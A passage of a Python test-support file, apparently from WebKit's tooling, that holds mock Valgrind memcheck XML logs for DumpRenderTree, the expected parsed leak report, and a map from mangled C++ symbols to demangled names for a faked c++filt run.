</frame>
<frame>
<ip>0x6F95848</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv</fn>
</frame>
<frame>
<ip>0x8E2D6CA</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libgio-2.0.so.0.3800.0</obj>
<fn>g_task_return_now</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio</dir>
<file>gtask.c</file>
<line>1108</line>
</frame>
<frame>
<ip>0x8E2D6E8</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libgio-2.0.so.0.3800.0</obj>
<fn>complete_in_idle_cb</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio</dir>
<file>gtask.c</file>
<line>1117</line>
</frame>
<frame>
<ip>0x93A62F4</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libglib-2.0.so.0.3800.0</obj>
<fn>g_main_context_dispatch</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib</dir>
<file>gmain.c</file>
<line>3065</line>
</frame>
<frame>
<ip>0x93A6637</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libglib-2.0.so.0.3800.0</obj>
<fn>g_main_context_iterate.isra.23</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib</dir>
<file>gmain.c</file>
<line>3712</line>
</frame>
<frame>
<ip>0x93A6A99</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libglib-2.0.so.0.3800.0</obj>
<fn>g_main_loop_run</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib</dir>
<file>gmain.c</file>
<line>3906</line>
</frame>
<frame>
<ip>0x8121204</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libgtk-3.so.0.600.0</obj>
<fn>gtk_main</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/gtk+-3.6.0/gtk</dir>
<file>gtkmain.c</file>
<line>1162</line>
</frame>
<frame>
<ip>0x44CBCE</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL7runTestRKSs</fn>
</frame>
<frame>
<ip>0x44CED6</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL20runTestingServerLoopv</fn>
</frame>
<frame>
<ip>0x43A2D3</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>main</fn>
</frame>
</stack>
<suppression>
<sname>insert_a_suppression_name_here</sname>
<skind>Memcheck:Leak</skind>
<sframe> <fun>_Znwm</fun> </sframe>
<sframe> <fun>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation</fun> </sframe>
<sframe> <fun>webkit_web_policy_decision_new</fun> </sframe>
<sframe> <fun>_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_</fun> </sframe>
<sframe> <fun>_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE</fun> </sframe>
<sframe> <fun>_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE</fun> </sframe>
<sframe> <fun>_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE</fun> </sframe>
<sframe> <fun>_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv</fun> </sframe>
<sframe> <fun>g_task_return_now</fun> </sframe>
<sframe> <fun>complete_in_idle_cb</fun> </sframe>
<sframe> <fun>g_main_context_dispatch</fun> </sframe>
<sframe> <fun>g_main_context_iterate.isra.23</fun> </sframe>
<sframe> <fun>g_main_loop_run</fun> </sframe>
<sframe> <fun>gtk_main</fun> </sframe>
<sframe> <fun>_ZL7runTestRKSs</fun> </sframe>
<sframe> <fun>_ZL20runTestingServerLoopv</fun> </sframe>
<sframe> <fun>main</fun> </sframe>
<rawtext>
<![CDATA[
{{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znwm
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_
fun:_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE
fun:_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE
fun:_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE
fun:_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv
fun:g_task_return_now
fun:complete_in_idle_cb
fun:g_main_context_dispatch
fun:g_main_context_iterate.isra.23
fun:g_main_loop_run
fun:gtk_main
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}}
]]>
</rawtext>
</suppression>
</error>
<error>
<unique>0x1a6</unique>
<tid>1</tid>
<kind>Leak_DefinitelyLost</kind>
<xwhat>
<text>8 bytes in 1 blocks are definitely lost in loss record 423 of 7,972</text>
<leakedbytes>8</leakedbytes>
<leakedblocks>1</leakedblocks>
</xwhat>
<stack>
<frame>
<ip>0x4C2AF8E</ip>
<obj>/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so</obj>
<fn>_Znwm</fn>
</frame>
<frame>
<ip>0x6839DEC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fn>
</frame>
<frame>
<ip>0x61E7B03</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_policy_decision_new</fn>
</frame>
<frame>
<ip>0x61CBA6D</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fn>
</frame>
<frame>
<ip>0x683DF52</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fn>
</frame>
<frame>
<ip>0x6817EFC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fn>
</frame>
<frame>
<ip>0x6818729</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fn>
</frame>
<frame>
<ip>0x6818A3A</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fn>
</frame>
<frame>
<ip>0x61E3148</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_frame_load_uri</fn>
</frame>
<frame>
<ip>0x44CC50</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL7runTestRKSs</fn>
</frame>
<frame>
<ip>0x44CED6</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL20runTestingServerLoopv</fn>
</frame>
<frame>
<ip>0x43A2D3</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>main</fn>
</frame>
</stack>
<suppression>
<sname>insert_a_suppression_name_here</sname>
<skind>Memcheck:Leak</skind>
<sframe> <fun>_Znwm</fun> </sframe>
<sframe> <fun>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fun> </sframe>
<sframe> <fun>webkit_web_policy_decision_new</fun> </sframe>
<sframe> <fun>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fun> </sframe>
<sframe> <fun>webkit_web_frame_load_uri</fun> </sframe>
<sframe> <fun>_ZL7runTestRKSs</fun> </sframe>
<sframe> <fun>_ZL20runTestingServerLoopv</fun> </sframe>
<sframe> <fun>main</fun> </sframe>
<rawtext>
<![CDATA[
{{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znwm
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_
fun:_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE
fun:_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE
fun:_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE
fun:webkit_web_frame_load_uri
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}}
]]>
</rawtext>
</suppression>
</error>
<errorcounts>
</errorcounts>
<suppcounts>
<pair>
<count>107</count>
<name>FcConfigAppFontAddFile (Third Party)</name>
</pair>
<pair>
<count>2098</count>
<name>gtk_init_check (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>g_quark_from_static_string (Third party)</name>
</pair>
<pair>
<count>27</count>
<name>FcConfigParseAndLoad (Third Party)</name>
</pair>
<pair>
<count>80</count>
<name>webkitAccessibleNew</name>
</pair>
<pair>
<count>177</count>
<name>g_thread_proxy (Third Party)</name>
</pair>
<pair>
<count>9</count>
<name>FcPatternObjectInsertElt 2 (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>gtk_window_realize (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>__nss_database_lookup (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>cairo_set_source_surface (Third Party)</name>
</pair>
<pair>
<count>2</count>
<name>libGL.so (Third party)</name>
</pair>
<pair>
<count>1</count>
<name>g_task_run_in_thread (Third Party)</name>
</pair>
<pair>
<count>2</count>
<name>WTF::ThreadIdentifierData::initialize() (Intentional)</name>
</pair>
<pair>
<count>1</count>
<name>gtk_css_provider_load_from_data (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>libenchant.so new (Third party)</name>
</pair>
</suppcounts>
</valgrindoutput>
""".format(process_name=process_name, pid=pid, uuid=uuid)
def make_mock_incomplete_valgrind_output(process_name, pid, uuid):
    """Return a truncated valgrind XML log for *process_name*.

    Mimics the file valgrind leaves behind while the traced process is
    still RUNNING: the <status> element is open-ended and no <error> or
    closing </valgrindoutput> tags were ever written, so XML parsing of
    this text must fail with "no element found".

    :param process_name: program name substituted into the Command line
    :param pid: process id substituted into <pid> and the --xml-file path
    :param uuid: unique id substituted into the --xml-file path
    """
    return """<?xml version="1.0"?>
<valgrindoutput>
<protocolversion>4</protocolversion>
<protocoltool>memcheck</protocoltool>
<preamble>
<line>Memcheck, a memory error detector</line>
<line>Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.</line>
<line>Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info</line>
<line>Command: /home/user/WebKit/WebKitBuild/Release/Programs/{process_name} -</line>
</preamble>
<pid>{pid}</pid>
<ppid>18577</ppid>
<tool>memcheck</tool>
<args>
<vargv>
<exe>/usr/bin/valgrind.bin</exe>
<arg>--tool=memcheck</arg>
<arg>--num-callers=40</arg>
<arg>--demangle=no</arg>
<arg>--trace-children=no</arg>
<arg>--smc-check=all-non-file</arg>
<arg>--leak-check=yes</arg>
<arg>--leak-resolution=high</arg>
<arg>--show-possibly-lost=no</arg>
<arg>--show-reachable=no</arg>
<arg>--leak-check=full</arg>
<arg>--undef-value-errors=no</arg>
<arg>--gen-suppressions=all</arg>
<arg>--xml=yes</arg>
<arg>--xml-file=/home/user/WebKit/WebKitBuild/Release/layout-test-results/drt-{pid}-{uuid}-leaks.xml</arg>
<arg>--suppressions=/home/user/WebKit/Tools/Scripts/valgrind/suppressions.txt</arg>
<arg>--suppressions=/usr/lib/valgrind/debian-libc6-dbg.supp</arg>
</vargv>
<argv>
<exe>/home/user/WebKit/WebKitBuild/Release/Programs/{process_name}</exe>
<arg>-</arg>
</argv>
</args>
<status>
<state>RUNNING</state>
<time>00:00:00:00.024 </time>
</status>
""".format(process_name=process_name, pid=pid, uuid=uuid)
def make_mock_valgrind_results():
    """Return the expected leak report for two well-formed XML logs.

    This is the text parse_and_print_leaks_detail() should emit for the
    two mock valgrind XML files: the merged suppression-count summary,
    then both Leak_DefinitelyLost stacks with symbols demangled through
    the mocked c++filt, each followed by its generated suppression block.
    Counts are doubled relative to one XML file because two files are
    parsed.
    """
    return """-----------------------------------------------------
Suppressions used:
count name
2 __nss_database_lookup (Third Party)
2 cairo_set_source_surface (Third Party)
2 g_quark_from_static_string (Third party)
2 g_task_run_in_thread (Third Party)
2 gtk_css_provider_load_from_data (Third Party)
2 gtk_window_realize (Third Party)
2 libenchant.so new (Third party)
4 WTF::ThreadIdentifierData::initialize() (Intentional)
4 libGL.so (Third party)
18 FcPatternObjectInsertElt 2 (Third Party)
54 FcConfigParseAndLoad (Third Party)
160 webkitAccessibleNew
214 FcConfigAppFontAddFile (Third Party)
354 g_thread_proxy (Third Party)
4196 gtk_init_check (Third Party)
-----------------------------------------------------
Valgrind detected 2 leaks:
Leak_DefinitelyLost
8 bytes in 1 blocks are definitely lost in loss record 422 of 7,972
operator new(unsigned long) (/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
webkit_web_policy_decision_new (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebKit::FrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, std::function<void (WebCore::PolicyAction)>) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::DocumentLoader::responseReceived(WebCore::CachedResource*, WebCore::ResourceResponse const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::sendRequestCallback(_GObject*, _GAsyncResult*, void*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
g_task_return_now (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio/gtask.c:1108)
complete_in_idle_cb (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio/gtask.c:1117)
g_main_context_dispatch (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib/gmain.c:3065)
g_main_context_iterate.isra.23 (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib/gmain.c:3712)
g_main_loop_run (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib/gmain.c:3906)
gtk_main (/home/user/WebKit/WebKitBuild/Dependencies/Source/gtk+-3.6.0/gtk/gtkmain.c:1162)
runTest(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
runTestingServerLoop() (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
main (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
Suppression (error hash=#8313DEB16B069438#):
{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znw*
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_
fun:_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE
fun:_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE
fun:_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE
fun:_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv
fun:g_task_return_now
fun:complete_in_idle_cb
fun:g_main_context_dispatch
fun:g_main_context_iterate.isra.23
fun:g_main_loop_run
fun:gtk_main
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}
Leak_DefinitelyLost
8 bytes in 1 blocks are definitely lost in loss record 421 of 7,972
operator new(unsigned long) (/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
webkit_web_policy_decision_new (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebKit::FrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::function<void (WebCore::PolicyAction)>) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::FrameLoader::load(WebCore::DocumentLoader*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::FrameLoader::load(WebCore::FrameLoadRequest const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
webkit_web_frame_load_uri (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
runTest(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
runTestingServerLoop() (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
main (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
Suppression (error hash=#0449D3ED253FE1F9#):
{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znw*
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_
fun:_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE
fun:_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE
fun:_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE
fun:webkit_web_frame_load_uri
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}
"""
# Maps mangled symbol names appearing in the mock valgrind XML to the
# demangled text the faked `c++filt` run (mock_run_cppfilt_command)
# returns.  Fix: the original literal listed the key
# 'webkit_web_policy_decision_new' twice with an identical value; the
# second entry silently overwrote the first, so the duplicate is removed.
valgrind_output_cppfilt_map = {
    '_Znwm': u'operator new(unsigned long)',
    '_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation': u'std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation)',
    'webkit_web_policy_decision_new': u'webkit_web_policy_decision_new',
    '_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE': u'WebKit::FrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::function<void (WebCore::PolicyAction)>)',
    '_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_': u'WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)',
    '_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE': u'WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>)',
    '_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE': u'WebCore::FrameLoader::load(WebCore::DocumentLoader*)',
    '_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE': u'WebCore::FrameLoader::load(WebCore::FrameLoadRequest const&)',
    'webkit_web_frame_load_uri': u'webkit_web_frame_load_uri',
    '_ZL7runTestRKSs': u'runTest(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)',
    '_ZL20runTestingServerLoopv': u'runTestingServerLoop()',
    'main': u'main',
    '_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation': u'std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation)',
    '_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE': u'WebKit::FrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, std::function<void (WebCore::PolicyAction)>)',
    '_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_': u'WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)',
